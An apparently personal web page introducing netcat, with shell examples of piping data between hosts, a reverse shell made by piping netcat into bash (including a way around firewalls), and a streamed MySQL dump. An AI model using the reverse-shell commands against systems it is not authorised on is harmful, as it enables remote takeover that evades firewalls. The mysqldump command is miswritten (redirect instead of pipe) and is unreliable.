adric.net

NetCat
Login

A Powerfool Tool

A fairly high level component to Unix and networking magicks. Not for the novice, much.

Netcat (nc(1)) is, as the name suggests, a version of cat(1) that works over network sockets. In fact it is likely the lowest-level networking tool you are going find or be able to install without scripting one yourself. Netcat may either send to or listen on a port (on an IP/hostname) and then acts exactly like cat(1).

So, rather than cat'ing a file from one folder to another, you cat a file (everything in Unix is a file, right?) to ... somewhere else. In it's most basic form:

lorelei-lee:~/Work/adricnet/trunk adric$ cat | nc localhost 33333
foo #typed
^C punt!
lorelei-lee:~/Desktop adric$ nc -l -p 33333
foo #appears
^C punt!

Plenty more in the man page or on example pages that Google easily, and maybe here later (FIXME). I'm pretty sure there are IPv6 versions by now, although this one seems not to be. I'm equally certain it's available for Windows, maybe even without Cygwin (LINKME).

Advanced Incantations

And as neat as it is to be able to simulate talk(1) without buffering or Tar Over SSH without security .. nc's real utility is in it's ability to set up things that you might not have been to do otherwise. And thereby really blowing holes in lots of security models.

Reverse Shells

You can simulate a remote shell by piping nc to (eg) bash:

lorelei-lee:~/Work/adricnet/trunk adric$ cat | nc localhost 33333
ls #typed

and:

lorelei-lee:~/Desktop adric$ nc -l -p 33333 | bash
#output here:
Etch SE Syllable Icon? Syllable 0.6.4 OpenSolaris WinXP Project LRNJ- Classic Hiragana Dream bugg Project LRNJ- Slime Forest evo ^C punt!

Frighteningly enough it works the other way too. Lets say you have the ability to execute commands on the server, but you can't receive connections there because of some firewall. Just switch it about. Timing is a little tricky, so listen first:

client# nc -l -p 33333
server$ nc localhost 33333 | bash
#then commands typed on client
id
uptime
#are executed and output on the server:
uid=501(adric) gid=501(adric) groups=501(adric), 81(appserveradm), 79(appserverusr), 80(admin)
11:37 up 19 days, 2:44, 4 users, load averages: 1.20 1.25 1.26

Reverse MySQL Dump

Once upon a time I was transferring customer SQL data from one server to another. Thing was, there was not enough diskspace free on the old server to mysqldump(1) out the gibibytes of stuff. and, mysql was configured to disallow remote acces by any user we had access to use. So, at the suggestion of a local wizard, we set up a reverse mysqldump with netcat, dumping from mysqldump straight to nc and across the wire (and the country, of course).

client# nc -l -p 33333 > sqldump.sql
server$ mysqldump -u root -p --databases > nc localhost 33333

The wizard actually recommends piping a 'gzip' in the midst for compression if it's going to be much data.

Refs

Netcat and Reverse Telnet on O'Reily Network: http://www.onlamp.com/pub/a/onlamp/2003/05/29/netcat.html